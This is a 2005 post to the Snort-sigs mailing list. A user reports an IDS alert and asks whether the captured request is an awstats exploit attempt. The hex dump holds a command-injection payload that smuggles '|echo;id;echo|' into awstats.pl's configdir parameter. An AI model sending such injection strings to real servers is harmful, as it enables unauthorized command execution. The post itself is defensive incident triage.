[Snort-sigs] Exploit attempt?

Giles Coochey giles at ...1554...
Tue Apr 5 06:14:44 EDT 2005


I saw the "WEB-ATTACKS id command attempt" triggered today, with the 
following in the payload:

000 : 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 61 77 73   GET /cgi-bin/aws
010 : 74 61 74 73 2E 70 6C 3F 63 6F 6E 66 69 67 64 69   tats.pl?configdi
020 : 72 3D 7C 65 63 68 6F 25 32 30 3B 65 63 68 6F 25   r=|echo%20;echo%
030 : 32 30 3B 69 64 3B 65 63 68 6F 25 32 30 3B 65 63   20;id;echo%20;ec
040 : 68 6F 7C 20 48 54 54 50 2F 31 2E 31 0D 0A         ho| HTTP/1.1..

Does that look like an awstats exploit attempt?

Does anyone have a vulnerability report on this?

Should I attempt to report the source address to the appropriate 
authority I get through a whois query?

Many thanks,

Giles




More information about the Snort-sigs mailing list